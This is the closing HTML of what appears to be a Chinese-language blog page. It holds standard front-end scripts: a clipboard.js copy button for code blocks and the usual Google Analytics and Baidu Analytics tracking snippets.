<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-84578611-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

    <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?2e6da3c375c789455b664cea6d4cb29c";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
    </script>

<!-- Disqus Comments -->


</body>
</html>
